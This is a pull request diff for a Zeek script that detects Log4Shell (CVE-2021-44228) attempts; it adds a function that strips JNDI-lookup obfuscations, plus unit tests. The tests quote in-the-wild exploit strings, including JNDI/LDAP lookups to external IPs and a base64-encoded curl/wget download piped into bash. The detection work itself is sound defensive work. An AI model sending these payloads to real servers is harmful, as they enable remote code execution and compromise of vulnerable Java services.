### PR TITLE
First pass on best effort normalization function

### DIFF
--- a/README.md
+++ b/README.md
@@ -26,6 +26,7 @@ more stable version of the package.
 - `CVE_2021_44228::ignorable_target_hosts` is a set of `target_host`s so ignore. It is a `set[string]` so both IPs and domains can be ignored.
 - `CVE_2021_44228::ignorable_orig_hosts` set of `addr`s from known benign scanners that can be ignored.
 - `CVE_2021_44228::ignorable_resp_hosts` above but for `resp`s.
+- `CVE_2021_44228::try_normalize` determines if normalizing the payload should be attempted. Defaults to `T`.
 
 ## Example Notice
 

--- a/scripts/CVE_2021_44228.zeek
+++ b/scripts/CVE_2021_44228.zeek
@@ -303,8 +303,9 @@ event zeek_init()
         print(exploit_pattern in "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=" == T);
         print(exploit_pattern in "https://foobarstuff.wiz.biz=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}" == F);
         print(normalize("${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=");
-    print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}");
-print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}");
+        print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}");
+        print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}");
+        print(normalize("${jndi:${lower:l${lower:d${lower:a${lower:p}}}}://foo.bar/baz}") == "${jndi:ldap://foo.bar/baz}");
 
         local empty_str_vector: vector of string;
         push("1");

--- a/scripts/CVE_2021_44228.zeek
+++ b/scripts/CVE_2021_44228.zeek
@@ -97,6 +97,16 @@ function clear_stack()
 # Attempts to normalize log4j payload to remove most common obfuscations. There
 # are effectively an infinite number of ways to do this, so don't expect it to
 # cover everything. See tests in `zeek_init()` to understand what it handles.
+#
+# Algorithm works as follows:
+#
+# "$" and "{" are pushed onto the stack when encountered.
+# Set a flag to show we have seen the first "$" "{" set.
+# If we are on our second+ set of "$" "{", start ignoring characters
+# If we see a ":" while ignoring, we have passed the function portion and should stop ignoring.
+# When we hit a "}", pop the previous "{" and "$" off the stack. If the stack is
+# now empty, this was the first instance (i.e., `${jdni...`) and it should be
+# preserved, otherwise, remove it.
 function normalize(payload: string): string
     {
     # Replace default substitution string with normal formatting string, i.e., ${::-j} -> ${:j}

--- a/scripts/CVE_2021_44228.zeek
+++ b/scripts/CVE_2021_44228.zeek
@@ -44,6 +44,9 @@ type PayloadParts: record {
 # and ending brace.
 # See test cases in zeek_init() for what we consider to be a TP/FP.
 global exploit_pattern: pattern = /\$\{[^@][^}]+:[^}]+\}/;
+
+# Stack used for `normalize`. Shouldn't be used outside of that function.
+global stack: vector of string;
 export {
     option log = T;
     # redef'd when running tests with btest. Leave as `F`.
@@ -58,7 +61,104 @@ export {
     # "exploitable" or a known "malicious" server attempting to exploit
     # vulnerable Java clients.
     option ignorable_resp_hosts: set[addr] = {};
+
+    # Try to normalize payloads to improve change of successfully retrieving the
+    # payload information.
+    option try_normalize = T;
 }
+
+function peek(): string
+    {
+    if ( |stack| == 0 )
+        return "";
+    else
+        return stack[|stack|-1];
+    }
+
+function pop(): string
+    {
+    if ( |stack| == 0 )
+        return "";
+    local x = peek();
+    stack = stack[0:|stack|-1];
+    return x;
+    }
+
+function push(x: string)
+    {
+    stack += x;
+    }
+
+function clear_stack()
+    {
+    stack = vector();
+    }
+
+# Attempts to normalize log4j payload to remove most common obfuscations. There
+# are effectively an infinite number of ways to do this, so don't expect it to
+# cover everything. See tests in `zeek_init()` to understand what it handles.
+function normalize(payload: string): string
+    {
+    # Replace default substitution string with normal formatting string, i.e., ${::-j} -> ${:j}
+    payload = gsub(payload, /::\-/, ":");
+    local to_remove: set[count];
+    local i = 0;
+    local ignoring = F;
+    local saw_first = F;
+    while ( i != |payload| )
+        {
+        local c = payload[i];
+        switch ( c )
+            {
+            case "$":
+                push(c);
+                break;
+            case "{":
+                if ( peek() == "$" )
+                    push(c);
+                if ( !saw_first )
+                    {
+                    saw_first = T;
+                    }
+                else
+                    {
+                    # Add previous "$"
+                    add to_remove[i-1];
+                    ignoring = T;
+                    }
+                break;
+            case ":":
+                if ( ignoring )
+                    {
+                    add to_remove[i];
+                    ignoring = F;
+                    }
+                break;
+            case "}":
+                local open_brace = pop();
+                local dollar = pop();
+                # We only want to remove internal ones
+                if ( dollar == "$" && open_brace == "{" && |stack| > 0 )
+                    add to_remove[i];
+                break;
+            }
+
+        if ( ignoring )
+            add to_remove[i];
+        ++i;
+        }
+
+    local new_payload: vector of string;
+    i = 0;
+    while ( i != |payload| )
+        {
+        if ( i !in to_remove )
+            new_payload += payload[i];
+        ++i;
+        }
+    clear_stack();
+    return join_string_vec(new_payload, "");
+    }
 
 # If split doesn't return the expected number of indices, return the default "-"
 function safe_split1_w_default(s: string, p: pattern, idx: count, missing: string &default="-"): string
@@ -78,6 +178,8 @@ function safe_split1_w_default(s: string, p: pattern, idx: count, missing: strin
 # ...value='${jndi:${lower:l}${lower:d}a${lower:p}://world443.log4j.bin${upper:a}ryedge.io:80/callback}'
 function parse_payload(s: string): PayloadParts
     {
+    if ( try_normalize )
+        s = normalize(s);
     local tmp = split_string(s, /\/\//);
     local last: string = "-";
     if ( |tmp| > 0 )
@@ -190,5 +292,30 @@ event zeek_init()
         print(exploit_pattern in "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}" == T);
         print(exploit_pattern in "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=" == T);
         print(exploit_pattern in "https://foobarstuff.wiz.biz=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;gdpr=${GDPR};gdpr_consent=${GDPR_CONSENT_755}" == F);
+        print(normalize("${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=") == "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8xNjIuMC4yMjguMjUzOjgwfHx3Z2V0IC1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0LzE2Mi4wLjIyOC4yNTM6ODApfGJhc2g=");
+    print(normalize("${jndi:${lower:l}${lower:d}a${lower:p}://world80.log4j.bin${upper:a}ryedge.io:80/ callback}") == "${jndi:ldap://world80.log4j.binaryedge.io:80/ callback}");
+print(normalize("${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://45.146.164.160:1389/t}") == "${jndi:ldap://45.146.164.160:1389/t}");
+
+        local empty_str_vector: vector of string;
+        push("1");
+        print(stack == vector("1"));
+        push("2");
+        print(stack == vector("1", "2"));
+        push("3");
+        print(stack == vector("1", "2", "3"));
+        print(peek() == "3");
+        print(pop() == "3");
+        print(peek() == "2");
+        print(pop() == "2");
+        print(peek() == "1");
+        print(pop() == "1");
+        print(peek() == "");
+        print(pop() == "");
+        push("1");
+        push("2");
+        push("3");
+        print(stack == vector("1", "2", "3"));
+        clear_stack();
+        print(stack == empty_str_vector);
         }
     }

--- a/testing/Baseline/log4j.unit/output
+++ b/testing/Baseline/log4j.unit/output
@@ -9,6 +9,7 @@ T
 T
 T
 T
+T
 [T]
 [T, T]
 [T, T, T]

--- a/testing/Baseline/log4j.unit/output
+++ b/testing/Baseline/log4j.unit/output
@@ -6,3 +6,19 @@ T
 T
 T
 T
+T
+T
+T
+[T]
+[T, T]
+[T, T, T]
+T
+T
+T
+T
+T
+T
+T
+T
+[T, T, T]
+[]


### PR DESCRIPTION
Addresses #6. Handles all cases listed there, as well as nested ones like `${lower:ldap}`. Will fail on nested default substitution ones `${::-ldap}`.